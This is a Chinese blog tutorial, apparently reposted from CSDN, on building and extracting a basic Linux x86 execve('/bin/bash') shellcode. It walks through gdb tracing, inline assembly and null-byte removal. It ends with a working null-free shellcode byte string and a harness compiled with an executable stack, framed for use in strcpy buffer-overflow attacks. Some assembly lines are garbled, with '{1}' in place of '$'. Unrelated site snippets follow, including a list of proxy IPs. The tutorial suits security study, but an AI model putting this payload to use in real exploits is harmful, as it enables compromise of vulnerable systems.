wangxiaolong_china

基本shellcode提取方法

转载请注明出处：http://blog.csdn.net/wangxiaolong_china

这里，我们将编写一个非常简单的shellcode，它的功能是得到一个命令行。我们将从该shellcode的C程序源码开始，逐步构造并提取shellcode。

该shellcode的C程序源码为：

root@linux:~/pentest# cat shellcode.c
#include <stdio.h>

int main(int argc, char **argv) {

    char *name[2];
    name[0] = "/bin/bash";
    name[1] = NULL;

    execve(name[0], name, NULL);

    return 0;
}




 
为了避免链接干扰，静态编译该shellcode，命令为：
root@linux:~/pentest# gcc -static -g -o shellcode shellcode.c

  
下面使用gdb调试并分析一下shellcode程序：
root@linux:~/pentest# gdb shellcode
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/pentest/shellcode...done.
(gdb) disass main
Dump of assembler code for function main:
   0x080482c0 <+0>:	push   %ebp
   0x080482c1 <+1>:	mov    %esp,%ebp
   0x080482c3 <+3>:	and    {1}xfffffff0,%esp
   0x080482c6 <+6>:	sub    {1}x20,%esp
   0x080482c9 <+9>:	movl   {1}x80ae428,0x18(%esp)
   0x080482d1 <+17>:	movl   {1}x0,0x1c(%esp)
   0x080482d9 <+25>:	mov    0x18(%esp),%eax
   0x080482dd <+29>:	movl   {1}x0,0x8(%esp)
   0x080482e5 <+37>:	lea    0x18(%esp),%edx
   0x080482e9 <+41>:	mov    %edx,0x4(%esp)
   0x080482ed <+45>:	mov    %eax,(%esp)
   0x080482f0 <+48>:	call   0x8052f10 <execve>
   0x080482f5 <+53>:	mov    {1}x0,%eax
   0x080482fa <+58>:	leave  
   0x080482fb <+59>:	ret    
End of assembler dump.


  
根据程序反汇编得到的代码分析，在call指令执行之前，函数堆栈的使用情况如下图所示：

 
我们用gdb调试运行shellcode，看我们上面的分析是否完全正确。
(gdb) b main
Breakpoint 1 at 0x80482c9: file shellcode.c, line 6.
(gdb) b *main+48
Breakpoint 2 at 0x80482f0: file shellcode.c, line 9.
(gdb) r
Starting program: /root/pentest/shellcode 

Breakpoint 1, main (argc=1, argv=0xbffff474) at shellcode.c:6
6		name[0] = "/bin/bash";
(gdb) x/s 0x80ae428
0x80ae428:	 "/bin/bash"
(gdb) c
Continuing.

Breakpoint 2, 0x080482f0 in main (argc=1, argv=0xbffff474) at shellcode.c:9
9		execve(name[0], name, NULL);
(gdb) x/4bx $ebp-40
0xbffff3b0:	0x28	0xe4 	0x0a 	0x08
(gdb) x/4bx $ebp-36
0xbffff3b4:	0xc8	    0xf3	    0xff 	0xbf
(gdb) x/4bx $ebp-32
0xbffff3b8:	0x00	0x00	0x00	0x00
(gdb) x/4bx $ebp-12
0xbffff3cc:	0x00	0x00	0x00	0x00
(gdb) x/4bx $ebp-16
0xbffff3c8:	0x28	0xe4 	0x0a	    0x08
(gdb)


  
从调试结果看，上面关于call指令前的堆栈的分析是完全正确的。
即main函数的关键在于调用了execve函数，在调试中我们可以看到在调用该函数前将三个参数按照从右往左的顺序依次压入堆栈中。首先压入0x0（即NULL参数），然后是指向0x80ae428的指针，最后压入地址0x80ae428。
接下来，我们反汇编execve函数，看看该函数的功能是如何实现的。
(gdb) disass execve
Dump of assembler code for function execve:
   0x08052f10 <+0>:	push   %ebp
   0x08052f11 <+1>:	mov    %esp,%ebp
   0x08052f13 <+3>:	mov    0x10(%ebp),%edx
   0x08052f16 <+6>:	push   %ebx
   0x08052f17 <+7>:	mov    0xc(%ebp),%ecx
   0x08052f1a <+10>:	mov    0x8(%ebp),%ebx
   0x08052f1d <+13>:	mov    {1}xb,%eax
   0x08052f22 <+18>:	call   *0x80cf098
   0x08052f28 <+24>:	cmp    {1}xfffff000,%eax
   0x08052f2d <+29>:	ja     0x8052f32 <execve+34>
   0x08052f2f <+31>:	pop    %ebx
   0x08052f30 <+32>:	pop    %ebp
   0x08052f31 <+33>:	ret    
   0x08052f32 <+34>:	mov    {1}xffffffe8,%edx
   0x08052f38 <+40>:	neg    %eax
   0x08052f3a <+42>:	mov    %gs:0x0,%ecx
   0x08052f41 <+49>:	mov    %eax,(%ecx,%edx,1)
   0x08052f44 <+52>:	or     {1}xffffffff,%eax
   0x08052f47 <+55>:	jmp    0x8052f2f <execve+31>
End of assembler dump.


  
可以看到该函数的核心是“call   *0x80cf098”这条指令。为了查看该call指令具体调用的函数名称，继续调试如下:
(gdb) b *execve+18
Breakpoint 1 at 0x8052f22
(gdb) r
Starting program: /root/pentest/shellcode 

Breakpoint 1, 0x08052f22 in execve ()
(gdb) stepi
0x00110414 in __kernel_vsyscall ()
(gdb) stepi
process 1870 is executing new program: /bin/bash
root@linux:/root/pentest# exit
exit

Program exited normally.
(gdb)


  
可以看到，该call指令调用了__kernel_vsyscall ()这个内核函数。又因为__kernel_vsyscall的设计目标是代替int 80, 也就是下面两种方式应该是等价的：
    /* int80 */                           /* __kernel_vsyscall */
     movl {1}


_NR_getpid, %eax movl {1}


_NR_getpid, %eax int {1}x80 call __kernel_vsyscall /* %eax=getpid() */ /* %eax=getpid() %/
 
同时，我们可以借鉴以前版本gcc编译后反汇编的代码查看execve的实现细节：
[scz@ /home/scz/src]> gdb shellcode
GNU gdb 4.17.0.11 with Linux support
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble main <-- -- -- 输入
Dump of assembler code for function main:
0x80481a0 :       pushl  %ebp
0x80481a1 :     movl   %esp,%ebp
0x80481a3 :     subl   {1}x8,%esp
0x80481a6 :     movl   {1}x806f308,0xfffffff8(%ebp)
0x80481ad :    movl   {1}x0,0xfffffffc(%ebp)
0x80481b4 :    pushl  {1}x0
0x80481b6 :    leal   0xfffffff8(%ebp),%eax
0x80481b9 :    pushl  %eax
0x80481ba :    movl   0xfffffff8(%ebp),%eax
0x80481bd :    pushl  %eax
0x80481be :    call   0x804b9b0 <__execve>
0x80481c3 :    addl   {1}xc,%esp
0x80481c6 :    xorl   %eax,%eax
0x80481c8 :    jmp    0x80481d0
0x80481ca :    leal   0x0(%esi),%esi
0x80481d0 :    leave
0x80481d1 :    ret
End of assembler dump.
(gdb) disas __execve <-- -- -- 输入
Dump of assembler code for function __execve:
0x804b9b0 <__execve>:   pushl  %ebx
0x804b9b1 <__execve+1>: movl   0x10(%esp,1),%edx
0x804b9b5 <__execve+5>: movl   0xc(%esp,1),%ecx
0x804b9b9 <__execve+9>: movl   0x8(%esp,1),%ebx
0x804b9bd <__execve+13>:        movl   {1}xb,%eax
0x804b9c2 <__execve+18>:        int    {1}x80
0x804b9c4 <__execve+20>:        popl   %ebx
0x804b9c5 <__execve+21>:        cmpl   {1}xfffff001,%eax
0x804b9ca <__execve+26>:        jae    0x804bcb0 <__syscall_error>
0x804b9d0 <__execve+32>:        ret
End of assembler dump.


  
即，execve的核心是一个软中断int $0x80。接下来，查看一下在软中断之前，各寄存器的内容，及其意义：
(gdb) disass execve
Dump of assembler code for function execve:
   0x08052f10 <+0>:	push   %ebp
   0x08052f11 <+1>:	mov    %esp,%ebp
   0x08052f13 <+3>:	mov    0x10(%ebp),%edx
   0x08052f16 <+6>:	push   %ebx
   0x08052f17 <+7>:	mov    0xc(%ebp),%ecx
   0x08052f1a <+10>:	mov    0x8(%ebp),%ebx
   0x08052f1d <+13>:	mov    {1}xb,%eax
   0x08052f22 <+18>:	call   *0x80cf098
   0x08052f28 <+24>:	cmp    {1}xfffff000,%eax
   0x08052f2d <+29>:	ja     0x8052f32 <execve+34>
   0x08052f2f <+31>:	pop    %ebx
   0x08052f30 <+32>:	pop    %ebp
   0x08052f31 <+33>:	ret    
   0x08052f32 <+34>:	mov    {1}xffffffe8,%edx
   0x08052f38 <+40>:	neg    %eax
   0x08052f3a <+42>:	mov    %gs:0x0,%ecx
   0x08052f41 <+49>:	mov    %eax,(%ecx,%edx,1)
   0x08052f44 <+52>:	or     {1}xffffffff,%eax
   0x08052f47 <+55>:	jmp    0x8052f2f <execve+31>
End of assembler dump.
(gdb) b *execve+18
Breakpoint 1 at 0x8052f22
(gdb) r
Starting program: /root/pentest/shellcode 

Breakpoint 1, 0x08052f22 in execve ()
(gdb) i r 
eax            0xb	11
ecx            0xbffff3c8	-1073744952
edx            0x0	0
ebx            0x80ae428	134931496
esp            0xbffff3a4	0xbffff3a4
ebp            0xbffff3a8	0xbffff3a8
esi            0x8048a40	134515264
edi            0xbffff42d	-1073744851
eip            0x8052f22	0x8052f22 <execve+18>
eflags         0x282	[ SF IF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/x 0xbffff3c8
0xbffff3c8:	 0x80ae428
(gdb) x/s 0x80ae428
0x80ae428:	 "/bin/bash"
(gdb) c
Continuing.
process 1981 is executing new program: /bin/bash
root@linux:/root/pentest# exit
exit

Program exited normally.
(gdb) 


  
可以看到，eax保存execve的系统调用号11，ebx保存name[0]（即“/bin/bash”），ecx保存name这个指针，edx保存0（即NULL），这样执行软中断之后，就能得到shell了。接下来，有了以上分析，我们就可以编写自己的shellcode了，同是验证上面分析结果的正确性。
下面，我们用C语言内嵌汇编的方式，构造shellcode，具体代码如下。有一点要注意，Linux X86默认的字节序是little-endian，所以压栈的字符串要注意顺序。（如“/bin/bash”,其16进制表示为0x2f 0x62 0x69 0x6e 0x2f 0x62 0x61 0x73 0x68，在little-endian模式下，其表示为0x68 0x73 0x61 0x62 0x2f 0x6e 0x69 0x62 0x2f，其中有个小技巧，不足4字节的用0x2f(即“/”)补足）。
root@linux:~/pentest# cat shellcode_asm.c
#include <stdio.h>

int main(int argc, char **argv) {

    asm(
            "mov $0x0,%edx;        \n\t"
            "push %edx;        \n\t"
            "push $0x68736162;    \n\t"
            "push $0x2f6e6962;    \n\t"
            "push $0x2f2f2f2f;    \n\t"
            "mov %esp,%ebx;        \n\t"
            "push %edx;        \n\t"
            "push %ebx;        \n\t"
            "mov %esp,%ecx;        \n\t"
            "mov $0xb,%eax;        \n\t"
            "int $0x80;        \n\t"
            );

            return 0;
}

root@linux:~/pentest# gcc -g -o shellcode_asm shellcode_asm.c
root@linux:~/pentest# ./shellcode_asm 
root@linux:/root/pentest# exit
exit
root@linux:~/pentest#


  
通过编译执行，我们成功的得到了shell命令行。在编写内嵌汇编时，一定要注意格式问题；当然，最重要的是在执行软中断前一定要使各寄存器的值符合我们之前分析的结果。
此时，编写工作还没有完结，要记住我们的最终目的是得到ShellCode，也就是一串汇编指令；而对于strcpy等函数造成的缓冲区溢出攻击，会认为0是一个字符串的终结，那么ShellCode如果包含0就会被截断，导致溢出失败。
用objdump反汇编这个shellcode，并查看是否包含0，命令为：
objdump –d shellcode_asm | less

  
该命令将会反汇编所有包含机器指令的section，请自行找到main段：
08048394 <main>:
 8048394:    55                       push   %ebp
 8048395:    89 e5                   mov    %esp,%ebp
 8048397:    ba 00 00 00 00      mov    {1}x0,%edx
 804839c:    52                       push   %edx
 804839d:    68 62 61 73 68      push  {1}x68736162
 80483a2:    68 62 69 6e 2f       push   {1}x2f6e6962
 80483a7:    68 2f 2f 2f 2f        push   {1}x2f2f2f2f
 80483ac:    89 e3                    mov    %esp,%ebx
 80483ae:    52                        push   %edx
 80483af:    53                        push   %ebx
 80483b0:    89 e1                    mov    %esp,%ecx
 80483b2:    b8 0b 00 00 00       mov    {1}xb,%eax
 80483b7:    cd 80                    int    {1}x80
 80483b9:    b8 00 00 00 00       mov    {1}x0,%eax
 80483be:    5d                        pop    %ebp
 80483bf:    c3                        ret  


  
从反汇编结果可以看到，有两条指令“mov    $0x0,%edx”和“mov    $0xb,%eax”包含0，需要变通一下。我们分别使用“x0r %edx,%edx”和“lea 0xb(%edx),%eax”来替换。
root@linux:~/pentest# cat shellcode_asm.c
#include <stdio.h>

int main(int argc, char **argv) {
    
    __asm__
    ("                \
         xor %edx,%edx;        \
        push %edx;        \
        push {1}x68736162;    \
        push {1}x2f6e6962;    \
        push {1}x2f2f2f2f;    \
        mov %esp,%ebx;        \
        push %edx;       \
        push %ebx;        \
        mov %esp,%ecx;        \
        lea 0xb(%edx),%eax;    \
        int {1}x80;        \
     ");

    return 0;
}
root@linux:~/pentest# gcc -g -o shellcode_asm shellcode_asm.c
root@linux:~/pentest# ./shellcode_asm 
root@linux:/root/pentest# exit
exit
root@linux:~/pentest#


  
运行没有问题，再看看这个shellcode有没有包含0：
08048394 <main>:
 8048394:    55                           push   %ebp
 8048395:    89 e5                       mov    %esp,%ebp
 8048397:    31 d2                       xor    %edx,%edx
 8048399:    52                           push   %edx
 804839a:    68 62 61 73 68           push   {1}x68736162
 804839f:    68 62 69 6e 2f            push   {1}x2f6e6962
 80483a4:    68 2f 2f 2f 2f             push   {1}x2f2f2f2f
 80483a9:    89 e3                        mov    %esp,%ebx
 80483ab:   52                             push   %edx
 80483ac:    53                            push   %ebx
 80483ad:    89 e1                        mov    %esp,%ecx
 80483af:    8d 42 0b                    lea    0xb(%edx),%eax
 80483b2:    cd 80                        int    {1}x80
 80483b4:    b8 00 00 00 00            mov    {1}x0,%eax
 80483b9:    5d                            pop    %ebp
 80483ba:    c3                            ret    
 80483bb:    90                            nop
 80483bc:    90                            nop
 80483bd:    90                            nop
 80483be:    90                            nop
 80483bf:    90                       nop


  
可以看到，所有曾经出现0的指令，在进行指令替换之后，所有的0全部消除了。注意，我们只提取嵌入汇编部分的指令的二进制代码作为我们的shellcode使用，即从0x8048397到0x80483b2地址之间的指令。
即，我们生成的shellcode为：
\x31\xd2\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80
root@linux:~/pentest# cat test_shellcode.c
#include <stdio.h>

char shellcode[] = 
"\x31\xd2\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f"
"\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

int main(int argc, char **argv) {
    __asm__
    ("                \
        call shellcode;        \
     ");
}
root@linux:~/pentest# gcc -g -o test_shellcode test_shellcode.c
root@linux:~/pentest# ./test_shellcode 
Segmentation fault
root@linux:~/pentest# gcc -z execstack -g -o test_shellcode test_shellcode.c
root@linux:~/pentest# ./test_shellcode 
root@linux:/root/pentest# exit
exit
root@linux:~/pentest#


  
可以看到，shellcode提取成功！

linux系统的目录结构 Petrus_shuai linux linux系统目录结构
一.目录结构详述linux系统的目录结构最顶端是“/”，一切目录从根开始。我们可以通过tree命令得到根（/）下的目录结构。[root@linux01~]#tree-L1//├──bin->usr/binusr/libusr/lib64├──media├──mnt实际都是内存中的信息├──rootusr/sbinrc.d/init.d说明：/etc/init.d等价于/etc/rc.d/init.
PyInstaller 打包 exe 文件 cliffordl python 综合 python 开发语言
PyInstaller是一个第三方库，它能够在Windows、Linux、MacOSX等操作系统下将Python源文件打包。通过对源文件打包，Python程序可以在没有安装Python的环境中运行，也可以作为一个独立文件方便传递和管理。PyInstaller支持Python2.7和Python3.3+。可以在Windows、MacOSX和Linux上使用，但是并不是跨平台的，而是说你要是希望打包成
2024金三银四必备：Java后端开发面试总结【25个技术专题】 2401_89790869 java 面试开发语言
16、List和Map、Set的区别？17、数组和链表分别比较适合用于什么场景，为什么？18、说说ConcurrentHashMap19、Java中ArrayList和LinkedList区别？20、TreeMap（可排序）21、请用两个队列模拟堆栈结构？22、Map中的key和value可以为null？23、数据结构基础之双向链表24、HashMap的底层实现25、ConcurrentHashM
web前端常见的面试题总结 2401_84436095 程序员前端
script.src=url+‘?’+data+‘callback=’+funcNamedocument.body.appendChild(script);//这里得到请求的数据，在回调函数中执行处理window[funcName]=function(data){callback(data)}}//使用jsonp(‘http:127.0.0.1:3000/api’,{},function(res)
深入了解 alias 命令哎呦，帅小伙哦开发工具开发工具 alias
1、alias简介在Unix和类Unix系统中，alias（别名）是一个非常实用的命令，它允许用户为常用的命令设置简短的别名，从而减少重复输入复杂命令的时间，提高工作效率。尤其是在命令行操作中，alias能大幅度提升生产力。alias是Unix/Linux系统中的一个命令，允许用户为长命令、参数或复杂的命令序列创建别名。使用别名，用户可以通过输入简短的命令来执行预定义的操作，从而减少键盘输入的时间
【Linux】 Linux下载RabbitMQ，并解决Github拒绝访问443的问题 wy02_ linux rabbitmq github
RabbitMQLinux下载资源时，GitHub网站443拒绝访问例如无法直接使用下面命令rpm--importhttps://github.com/rabbitmq/signing-keys/releases/download/2.0/rabbitmq-release-signing-key.asc在Linux中无法访问Github(外网)资源的都可以采用以下类似的方式首先我们可以访问http
uniapp 开发 h5 授权微信登录（静默和非静默）陈龙龙的陈龙龙 uni-app uni-app 微信前端 html javascript
具体流程：进入h5➡️静默登录➡️请求登录接口➡️必要时候调起登录组件➡️点击按钮进行非静默登录➡️再次请求登录接口➡️获取到所有用户数据一、封装登录functionauthLogin:(callback)=>{constthat=this;//判断是否是在微信环境下运行if(utils.isWechat()){consttoken=window.localStorage.getItem('__t
centos8 卸载go_Linux下Go的安装、配置、升级和卸载 weixin_39987313 centos8 卸载go
本文同时发布于个人CSDN博客:https://blog.csdn.net/ggq89/article/details/82682171#1.手动安装Go由于大家使用的Linux版本不尽相同，也不见得是最新版本或需要版本的Go语言包，所以我们说一下如何手动安装指定版本。*1.下载Go发行版从官方地址：https://golang.org/dl/上下载合适的二进制发行版(例如:go1.10.4.li
【SQL Server】超详细SQLServer日期转换、字符串、数学、聚合等常用函数大全（最新版） web13093320398 面试学习路线阿里巴巴 sqlserver 数据库
文章目录一、字符串函数1、获取uuid2、字符串截取3、字符串拼接4、字符串去空格5、大小写转换6、格式化数字为字符串7、字符串替换、转换8、查找与定位9、ISNULL判空取值二、日期时间函数1、获取当前日期和时间2、提取日期部分3、DATENAME(datepart,date_expr)函数，返回指定日期的指定部分,返回字符串。获取年、月、日、星期、周数、时、分、秒4、DATEPART(date
微信小程序通用静默获取openid和Session_key TurboMT 小程序 php 小程序 php openid
小程序公共app.js代码//app.jsconstserver=require('./server/server.js');App({onLaunch:function(){//展示本地存储能力varlogs=wx.getStorageSync('logs')||[]logs.unshift(Date.now())wx.setStorageSync('logs',logs)//登录wx.chec
Node.js 版本管理工具完全指南九情丶 node.js
Node.js版本管理工具完全指南目录1.nvm(NodeVersionManager)2.n(NodePackageManager)3.fnm(FastNodeManager)4.Volta5.工具对比1.nvm(NodeVersionManager)1.1安装指南macOS/Linux#使用curl安装curl-o-https://raw.githubusercontent.com/nvm-s
Node.js 安装配置完全指南九情丶 node.js npm
Node.js安装配置完全指南-从入门到进阶概述本文将详细介绍如何在不同操作系统上安装和配置Node.js环境，包括基础安装、环境变量配置、版本管理等进阶内容，适合新手入门和老手参考。目录基础知识Windows安装指南macOS安装指南Linux安装指南环境变量配置版本管理工具常见问题解决进阶技巧基础知识Node.js版本说明LTS版本：长期支持版，建议生产环境使用Current版本：最新特性版，
【Elasticsearch 】聚合分析：聚合概述程风破～ Elasticsearch elasticsearch 大数据搜索引擎
博主简介：CSDN博客专家，历代文学网（PC端可以访问：https://literature.sinhy.com/#/?__c=1000，移动端可微信小程序搜索“历代文学”）总架构师，15年工作经验，精通Java编程，高并发设计，Springboot和微服务，熟悉Linux，ESXI虚拟化以及云原生Docker和K8s，热衷于探索科技的边界，并将理论知识转化为实际应用。保持对新技术的好奇心，乐于分
go语言安装与卸载 kankan231 golang golang linux
Linux下go语言的安装1在https://studygolang.com/dl上下载相应的系统版本下载Linux版本压缩包：wgethttps://studygolang.com/dl/golang/go1.17.linux-amd64.tar.gz2解压到/usr/local/gotar-C/usr/local-xzfgo1.17.linux-amd64.tar.gz3添加/usr/loca
【Vim Masterclass 笔记22】S09L40 + L41：同步练习11：Vim 的配置与 vimrc 文件的相关操作（含点评课内容）安冬的码畜日常 Vim Masterclass vim 笔记 vim配置 vim同步练习 vim options vim option-list
文章目录S09L40Exercise11-VimSettingsandtheVimrcFile1训练目标2操作指令2.1.打开vimrc-sample文件2.2.尝试各种选项与设置2.3.将更改内容保存到vimrc-sample文件2.4.将文件vimrc-sample的内容复制到寄存器2.5.创建专属vimrc文件2.6.对于Mac、Linux或Unix用户2.7.对于Windows用户2.8.
Linux环境下删除Golang HoUnix golang
在Linux操作系统中，如果你决定删除Golang编程语言及其相关组件，需要执行一系列步骤。本文将为你提供详细的指导，并附上相应的源代码。卸载Golang首先，需要卸载已安装的Golang。在终端中执行以下命令：sudorm-rf/usr/local/go这将删除Golang的安装目录。移除环境变量下一步是从系统环境变量中移除与Golang相关的路径。打开终端，编辑~/.profile文件（或者是
ubuntu安装、升级、卸载go语言 aspirinnil linux golang linux ubuntu golang
ubuntu安装、升级、卸载golang一、安装go二、升级go1.卸载go2.重新安装新版本的golangubuntu安装、升级、卸载golang一、安装go下载go方法一：官网下载：https://golang.org/dl/方法二：打开ubuntu输入：wgethttps://dl.google.com/go/go1.15.3.linux-amd64.tar.gz
day 21 qq_50996930 C++学习专栏 c++stl
C++11新特性智能指针右值引用和move语句auto关键字（根据初始化的值自动推导类型）lambda表达式for的范围遍历类和结构体中初始化列表nullptr代替null统一的初始化方式…智能指针：智能指针利用RAII思想将指针进行封装，使其在构造时分配内存，析构时释放内存，将动态分配的内存交给类对象管理，防止堆内存泄漏。常见的三种智能指针分别是unique_ptr，shared_ptr，wea
Centos常用命令，按功能分类，用户和权限管理等 ZHOUPUYU 资料分享 centos linux 运维
CentOS是一个基于RedHatEnterpriseLinux(RHEL)的免费开源操作系统，稳定可靠，广泛应用于服务器环境。以下是一份CentOS使用教程及常用命令的总结，帮助你快速上手。由于篇幅限制，这里只涵盖常用命令和基本操作，更深入的学习需要参考CentOS官方文档和相关书籍。一、安装CentOSCentOS的安装过程与其他Linux发行版类似，通常包含以下步骤：下载镜像:从CentOS
Linux(Centos 7.6)命令详解：dos2unix 豆是浪个 linux 运维服务器
1.命令作用将Windows格式文件件转换为Unix、Linux格式的文件(也可以转换成其他格式的)2.命令语法Usage:dos2unix[options][file...][-ninfileoutfile...]3.参数详解options:-c,--convmode，转换方式，支持ascii,7bit,iso,mac,默认为ascii-f,--force，强制转换二进制文件-k,--keepd
deepin-grep详解：文本搜索的强大工具 deepin
在Linux系统中，grep命令是一个极其强大的文本搜索工具，广泛应用于文本处理、日志分析和数据筛选等场景。它的全称是“GlobalsearchREgularexpressionandPrintouttheline”，即全局搜索正则表达式并打印匹配的行。本文将详细介绍grep命令的基本用法、常用选项以及正则表达式的使用技巧。1.grep命令的基本功能grep命令的主要作用是从文本文件或管道数据流中
Android Rxjava3 使用场景 2401_89760309 android
Observable>>hotKey=ApiManager.getInstance().getApiService().getHotKey();Observable.just(articleList).subscribeOn(Schedulers.io()).observeOn(AndroidSchedulers.mainThread()).map(newFunction,Observable>>
Nginx日志分割（默认不分割）后端
Nginx日志分割nginx日志默认不分割导致，单个日志文件，造成大文件，影响nginx程序运行。使用方法使用定时任务3023***cd/home/ccodsupport/nginxLog&&sudo./nginxLog.sh&>/dev/null修改nginx日志路径#!/bin/bash#设置Nginx日志目录logdir="/home/nginx/logs"#查找所有日志文件find"$lo
Debian常用命令详解 -龙川- 介绍学习笔记 debian
Debian是一个广泛使用的Linux发行版，以其稳定性和包管理系统的丰富性著称。对于新手和经验丰富的系统管理员来说，掌握常用的Debian命令至关重要。这篇文章将详细介绍Debian系统中常用的命令，包括文件和目录操作、软件包管理、用户和权限管理、系统监控和网络管理等多个方面。一、文件和目录操作1.ls-列出目录内容ls命令用于列出目录中的文件和子目录。ls常用选项：-l：以长格式显示详细信息。
deepin分享-Linux 磁盘分区和挂载指南 deepin
在Linux系统中(如deepin等)，磁盘分区和挂载是系统管理的重要组成部分。了解如何进行分区、格式化和挂载操作，可以帮助你更好地管理磁盘空间，优化系统性能，并确保数据的安全存储。本文将详细介绍Linux磁盘分区和挂载的基本概念、操作步骤以及一些实用的命令。1.基本概念Linux系统采用了一种独特的文件系统结构，无论系统中有多少个分区，它们最终都归属于一个根目录（/），形成一个统一的文件系统。每
NPM 问题：ERESOLVE overriding peer dependency、Cannot read properties of null (reading ‘matches‘) 我命由我12345 前端 -问题清单 npm 前端 node.js java-ee java javascript js
问题描述与处理策略1、问题描述npmWARNERESOLVEoverridingpeerdependencynpmWARNERESOLVEoverridingpeerdependencynpmWARNERESOLVEoverridingpeerdependencynpmWARNERESOLVEoverridingpeerdependencynpmWARNERESOLVEoverridingpeer
MySQL--mysqld、mysql_safe、mysql.server、mysqladmin几种启动和停止服务使用说明 m0_74823683 面试学习路线阿里巴巴 mysql adb android
您好，我是贾斯汀，欢迎进来学习的小伙伴~【学习背景】本文对Linux下启动和停止mysql服务最常用的几种方式进行讲解：（1）mysqld（2）mysqld_safe（3）mysql.server（4）mysqladmin关于这几种文件和命令对mysql服务的启动和停止的使用，本文会分别进行介绍，还有一些关键的事项，比如生产环境对于MySQL服务的启动和停止是非常谨慎的一件事，不是每一种方式都适合
sui框架点击图片放大显示 jiidd
$(function(){$.init();$(document).on('click','.albumImgs',function(){varpic=$(this).parent().find(".albumImgs").map(function(){return$(this).data("src");}).get();$.photoBrowser({photos:pic,//注意此处是数组[]
Linux操作系统配置Mysql环境变量 MySQL冲冲冲 linux mysql 运维
安装好了mysql之后，在linux服务器上使用mysql-uroot-p命令登录mysql数据库，出现：-bash:mysqlcommandnotfound；再使用mysql--V报同样的问题。需要配置mysql环境变量，过程如下：1.找到mysql安装路径：先执行：find/|grepbin/mysql出现一些安装路径后，用安装路径-V，如果能输出mysql版本，那么该路径就是mysql的安装
solidity基础 -- 内联汇编第十六年盛夏. Solidity 区块链搭建和维护区块链智能合约
Solidity是以太坊智能合约开发的主流语言，而内联汇编（InlineAssembly）则为开发者提供了一种直接操作EVM（以太坊虚拟机）的低级方式。通过内联汇编，开发者可以实现一些在Solidity中难以实现或效率较低的功能，例如直接操作内存、存储或优化gas消耗。本文将详细介绍Solidity内联汇编的语法、应用场景以及具体实例。一、内联汇编简介性能优化：在某些对性能要求极高的场景下，Sol
312个免费高速HTTP代理IP（能隐藏自己真实IP地址） yangshangchuan 高速免费 superword HTTP代理
124.88.67.20:843 190.36.223.93:8080 117.147.221.38:8123 122.228.92.103:3128 183.247.211.159:8123 124.88.67.35:81 112.18.51.167:8123 218.28.96.39:3128 49.94.160.198:3128 183.20
pull解析和json编码百合不是茶 android pull解析 json
n.json文件: [{name:java,lan:c++,age:17},{name:android,lan:java,age:8}] pull.xml文件 <?xml version="1.0" encoding="utf-8"?> <stu> <name>java
[能源与矿产]石油与地球生态系统 comsci 能源
按照苏联的科学界的说法,石油并非是远古的生物残骸的演变产物,而是一种可以由某些特殊地质结构和物理条件生产出来的东西,也就是说,石油是可以自增长的.... 那么我们做一个猜想: 石油好像是地球的体液,我们地球具有自动产生石油的某种机制,只要我们不过量开采石油,并保护好
类与对象浅谈沐刃青蛟 java 基础
类，字面理解，便是同一种事物的总称，比如人类，是对世界上所有人的一个总称。而对象，便是类的具体化，实例化，是一个具体事物，比如张飞这个人，就是人类的一个对象。但要注意的是：张飞这个人是对象，而不是张飞，张飞只是他这个人的名字，是他的属性而已。而一个类中包含了属性和方法这两兄弟，他们分别用来描述对象的行为和性质（感觉应该是
新站开始被收录后，我们应该做什么？ IT独行者 PHP seo
新站开始被收录后，我们应该做什么？百度终于开始收录自己的网站了，作为站长，你是不是觉得那一刻很有成就感呢，同时，你是不是又很茫然，不知道下一步该做什么了？至少我当初就是这样，在这里和大家一份分享一下新站收录后，我们要做哪些工作。至于如何让百度快速收录自己的网站，可以参考我之前的帖子《新站让百
oracle 连接碰到的问题文强chu oracle
Unable to find a java Virtual Machine－－安装64位版Oracle11gR2后无法启动SQLDeveloper的解决方案作者：草根IT网来源：未知人气：813标签：导读：安装64位版Oracle11gR2后发现启动SQLDeveloper时弹出配置java.exe的路径，找到Oracle自带java.exe后产生的路径“C:\app\用户名\prod
Swing中按ctrl键同时移动鼠标拖动组件（类中多借口共享同一数据）小桔子 java 继承 swing 接口监听
都知道java中类只能单继承，但可以实现多个接口，但我发现实现多个接口之后，多个接口却不能共享同一个数据，应用开发中想实现：当用户按着ctrl键时，可以用鼠标点击拖动组件，比如说文本框。编写一个监听实现KeyListener,NouseListener,MouseMotionListener三个接口，重写方法。定义一个全局变量boolea
linux常用的命令 aichenglong linux 常用命令
1 startx切换到图形化界面 2 man命令:查看帮助信息 man 需要查看的命令,man命令提供了大量的帮助信息,一般可以分成4个部分 name:对命令的简单说明 synopsis:命令的使用格式说明 description:命令的详细说明信息 options:命令的各项说明 3 date:显示时间语法：date [OPTION]... [+FORMAT]
eclipse内存优化 AILIKES java eclipse jvm jdk
一基本说明在JVM中，总体上分2块内存区,默认空余堆内存小于 40%时，JVM就会增大堆直到-Xmx的最大限制；空余堆内存大于70%时，JVM会减少堆直到-Xms的最小限制。 1)堆内存(Heap memory):堆是运行时数据区域，所有类实例和数组的内存均从此处分配,是Java代码可及的内存，是留给开发人
关键字的使用探讨百合不是茶关键字
//关键字的使用探讨/*访问关键词private 只能在本类中访问public 只能在本工程中访问protected 只能在包中和子类中访问默认的只能在包中访问*//*final 类方法变量 final 类不能被继承 final 方法不能被子类覆盖，但可以继承 final 变量只能有一次赋值，赋值后不能改变 final 不能用来修饰构造方法*///this()
JS中定义对象的几种方式 bijian1013 js
1. 基于已有对象扩充其对象和方法(只适合于临时的生成一个对象)： <html> <head> <title>基于已有对象扩充其对象和方法(只适合于临时的生成一个对象)</title> </head> <script> var obj = new Object();
